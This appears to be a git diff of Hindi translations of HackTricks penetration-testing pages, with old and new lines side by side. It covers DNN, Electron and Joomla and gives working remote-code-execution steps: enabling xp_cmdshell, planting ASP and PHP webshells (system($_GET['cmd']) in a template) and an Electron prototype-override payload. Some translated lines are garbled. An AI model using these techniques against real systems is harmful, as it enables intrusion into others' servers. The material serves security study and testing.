# DotNetNuke (DNN) # डॉटनेटन्यूक (DNN)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
## DotNetNuke (DNN) ## डॉटनेटन्यूक (DNN)
यदि आप DNN में **व्यवस्थापक** के रूप में प्रवेश करते हैं, तो RCE प्राप्त करना आसान हो जाता है। यदि आप DNN में **प्रशासक** के रूप में प्रवेश करते हैं तो RCE प्राप्त करना आसान है।
## RCE ## RCE
### SQL के माध्यम से ### SQL के माध्यम से
**`Settings`** पृष्ठ के तहत एक SQL कंसोल उपलब्ध होता है जहां आप **`xp_cmdshell`** को सक्षम कर सकते हैं और **ऑपरेटिंग सिस्टम के कमांड चला सकते हैं**। **`सेटिंग्स`** पृष्ठ के तहत एक SQL कंसोल उपलब्ध है जहाँ आप **`xp_cmdshell`** को सक्षम कर सकते हैं और **ऑपरेटिंग सिस्टम कमांड चला सकते हैं**।
**`xp_cmdshell`** को सक्षम करने के लिए इन लाइनों का उपयोग करें: **`xp_cmdshell`** को सक्षम करने के लिए इन लाइनों का उपयोग करें:
```sql ```sql
@ -29,32 +29,32 @@ RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE RECONFIGURE
``` ```
और **"Run Script"** दबाएं ताकि वह sQL वाक्यों को चलाएं। और **"Run Script"** दबाएं ताकि वह sQL वाक्य चल सकें।
फिर, निम्नलिखित की तरह कुछ इस्तेमाल करें ताकि ओएस कमांड चलाएं: फिर, निम्नलिखित की तरह OS कमांड चलाने के लिए कुछ इस्तेमाल करें:
```sql ```sql
xp_cmdshell 'whoami' xp_cmdshell 'whoami'
``` ```
### ASP वेबशेल के माध्यम से ### एएसपी वेबशेल के माध्यम से
`सेटिंग्स -> सुरक्षा -> अधिक -> अधिक सुरक्षा सेटिंग्स` में आप `अनुमति योग्य फ़ाइल एक्सटेंशन` के तहत **नए अनुमत एक्सटेंशन जोड़ सकते हैं**, और फिर `सेव करें` बटन पर क्लिक करें। `सेटिंग्स -> सुरक्षा -> अधिक -> अधिक सुरक्षा सेटिंग्स` में आप **अनुमत फ़ाइल एक्सटेंशन जोड़ सकते हैं** अधिकतम फ़ाइल एक्सटेंशन के तहत, और फिर `सेव करने` बटन पर क्लिक करें।
**`asp`** या **`aspx`** जोड़ें और फिर **`/admin/file-management`** में एक **asp वेबशेल** अपलोड करें, उदाहरण के लिए `shell.asp` **`asp`** या **`aspx`** जोड़ें और फिर **`/admin/file-management`** में एक **asp वेबशेल** अपलोड करें जिसे `shell.asp` नामक कहा जा सकता है
फिर **`/Portals/0/shell.asp`** पर जाकर अपने वेबशेल तक पहुंचें। फिर **`/Portals/0/shell.asp`** तक पहुंचने के लिए अपने वेबशेल तक पहुंचें।
### विशेषाधिकार उन्नयन ### विशेषाधिकार उन्नयन
आप **Potatoes** या **PrintSpoofer** का उपयोग करके **विशेषाधिकार उन्नयन** कर सकते हैं।&#x20; आप **आलू** या **PrintSpoofer** का उपयोग करके **विशेषाधिकार उन्नयन** कर सकते हैं।&#x20;
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहेंगे**? या क्या आप **पीईएएस के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहेंगे**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>

View file

@ -1,22 +1,22 @@
# Electron contextIsolation RCE के माध्यम से Electron आंतरिक कोड के द्वारा # Electron contextIsolation RCE के माध्यम से Electron आंतरिक कोड के माध्यम से RCE
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details> </details>
## उदाहरण 1 ## उदाहरण 1
उदाहरण [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41) से है उदाहरण [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41) से।
"exit" घटना सुनने वाला लिस्टनर हमेशा आंतरिक कोड द्वारा सेट किया जाता है जब पृष्ठ लोडिंग शुरू होती है। यह घटना संचालन से पहले उत्पन्न होती है: "exit" घटना सुनने वाला लिस्टनर हमेशा आंतरिक कोड द्वारा सेट किया जाता है जब पृष्ठ लोडिंग शुरू होता है। यह घटना नेविगेशन से ठीक पहले उत्पन्न होती है:
```javascript ```javascript
process.on('exit', function (){ process.on('exit', function (){
for (let p in cachedArchives) { for (let p in cachedArchives) {
@ -31,19 +31,19 @@ cachedArchives[p].destroy()
https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- अब मौजूद नहीं है https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- अब मौजूद नहीं है
फिर यहा जाता है: फिर यहा जाता है:
![](<../../../.gitbook/assets/image (647).png>) ![](<../../../.gitbook/assets/image (647).png>)
जहां "self" नोड का प्रक्रिया ऑब्जेक्ट है: जहां "self" Node की प्रक्रिया वस्तु है:
![](<../../../.gitbook/assets/image (652) (1).png>) ![](<../../../.gitbook/assets/image (652) (1).png>)
प्रक्रिया ऑब्जेक्ट में "require" फंक्शन के संदर्भ होते हैं: प्रक्रिया वस्तु में "require" फ़ंक्शन को संदर्भ है:
``` ```
process.mainModule.require process.mainModule.require
``` ```
जैसा कि handler.call को process ऑब्जेक्ट प्राप्त होने जा रहा है, हम इसे अधिकारिक कोड चलाने के लिए अधिलेखित कर सकते हैं: जैसे हैंडलर.call प्रक्रिया ऑब्जेक्ट प्राप्त करने जा रहा है, हम इसे अभिजात कोड निष्पादित करने के लिए अधिलेखित कर सकते हैं:
```html ```html
<script> <script>
Function.prototype.call = function(process){ Function.prototype.call = function(process){
@ -54,13 +54,13 @@ location.reload();//Trigger the "exit" event
``` ```
## उदाहरण 2 ## उदाहरण 2
**प्रोटोटाइप प्रदूषण से रिक्वायर ऑब्जेक्ट प्राप्त करें**। [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81) से। **प्रोटोटाइप प्रदूषण से रिक्वायर ऑब्जेक्ट प्राप्त करें**। [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
लीक: लीक:
<figure><img src="../../../.gitbook/assets/image (34).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (34).png" alt=""><figcaption></figcaption></figure>
ोषण: ात्रुता:
<figure><img src="../../../.gitbook/assets/image (35).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../.gitbook/assets/image (35).png" alt=""><figcaption></figcaption></figure>
@ -68,10 +68,10 @@ location.reload();//Trigger the "exit" event
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह। * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**।
</details> </details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप PEASS के **नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**. * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs जमा करके।
</details> </details>
### Joomla सांख्यिकी ### Joomla आंकड़े
Joomla कुछ अनाम [उपयोग सांख्यिकी](https://developer.joomla.org/about/stats.html) एकत्र करता है जैसे कि Joomla, PHP और डेटाबेस संस्करणों का विभाजन और Joomla स्थापनाओं पर उपयोग में सर्वर ऑपरेटिंग सिस्टम्स। इस डेटा को उनके सार्वजनिक [API](https://developer.joomla.org/about/stats/api.html) के माध्यम से पूछताछ की जा सकती है। Joomla कुछ गैर-पहचानी [उपयोग आंकड़े](https://developer.joomla.org/about/stats.html) जमा करता है जैसे Joomla, PHP और डेटाबेस संस्करण और सर्वर ऑपरेटिंग सिस्टम का विवरण जो Joomla स्थापनाओं पर उपयोग में हैं। इस डेटा को उनके सार्वजनिक [API](https://developer.joomla.org/about/stats/api.html) के माध्यम से क्वेरी किया जा सकता है।
```bash ```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
@ -42,17 +42,17 @@ curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
} }
} }
``` ```
## सूचीकरण ## जांचना
### खोज/फुटप्रिंटिंग ### खोज/फुटप्रिंटिंग
* **मेटा** की जाच करें * **मेटा** की जाच करें
```bash ```bash
curl https://www.joomla.org/ | grep Joomla | grep generator curl https://www.joomla.org/ | grep Joomla | grep generator
<meta name="generator" content="Joomla! - Open Source Content Management" /> <meta name="generator" content="Joomla! - Open Source Content Management" />
``` ```
* robots.txt * रोबोट्स.टेक्स्ट
``` ```
# If the Joomla site is installed within a folder # If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file # eg www.example.com/joomla/ then the robots.txt file
@ -73,10 +73,8 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
### संस्करण ### संस्करण
* **/administrator/manifests/files/joomla.xml** में आप संस्करण देख सकते हैं। * **/administrator/manifests/files/joomla.xml** में आप संस्करण देख सकते हैं।
* **/language/en-GB/en-GB.xml** में आप Joomla का संस्करण प्राप्त कर सकते हैं। * **/language/en-GB/en-GB.xml** में जूमला का संस्करण प्राप्त कर सकते हैं।
* **plugins/system/cache/cache.xml** में आप एक अनुमानित संस्करण देख सकते हैं। * **plugins/system/cache/cache.xml** में लगभग संस्करण देख सकते हैं।
### स्वचालित
```bash ```bash
droopescan scan joomla --url http://joomla-site.local/ droopescan scan joomla --url http://joomla-site.local/
``` ```
@ -90,23 +88,11 @@ admin:admin
``` ```
## RCE ## RCE
यदि आपने **admin credentials** प्राप्त कर लिए हैं, तो आप **RCE के अंदर** **PHP कोड** का एक टुकड़ा जोड़कर **RCE** प्राप्त कर सकते हैं। हम यह **template** को **customizing** करके कर सकते हैं। यदि आपने **व्यवस्थापक क्रेडेंशियल्स** प्राप्त किए हैं तो आप **एक स्निपेट PHP कोड जोड़कर इसके अंदर RCE** कर सकते हैं। हम इसे **एक टेम्पलेट** को **कस्टमाइज़ करके** कर सकते हैं।
1. **`Templates`** पर **क्लिक करें** जो कि `Configuration` के नीचे बाईं ओर है, ताकि templates मेनू खुल जाए 1. `Configuration` के नीचे **`Templates`** पर **`क्लिक`** करें ताकि टेम्पलेट मेनू खोलें
2. किसी **template** नाम पर **क्लिक करें**। चलिए **`protostar`** को चुनते हैं जो कि `Template` कॉलम हेडर के नीचे है। इससे हम **`Templates: Customise`** पेज पर पहुंचेंगे 2. `Template` स्तंभ के तहत **`protostar`** का चयन करें। यह हमें **`Templates: Customise`** पृष्ठ पर ले जाएगा
3. अंत में, आप किसी पेज पर क्लिक करके **page source** खोल सकते हैं। चलिए **`error.php`** पेज को चुनते हैं। हम निम्नलिखित के अनुसार **कोड निष्पादन प्राप्त करने के लिए PHP one-liner जोड़ेंगे**: 3. अंततः, आप **पेज स्रोत** खोलने के लिए किसी पेज पर क्लिक कर सकते हैं। हम **`error.php`** पेज का चयन करेंगे। हम निम्नलिखित रूप में **PHP वन-लाइनर जोड़ें कोड एक्झीक्यूशन प्राप्त करने के लिए**:
1. **`system($_GET['cmd']);`** 1. **`system($_GET['cmd']);`**
4. **सेव & क्लोज** 4. **सहेजें और बंद करें**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id` 5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप चाहते हैं कि आपकी **company का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुंच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का।
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **hacktricks repo** में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

View file

@ -4,34 +4,34 @@
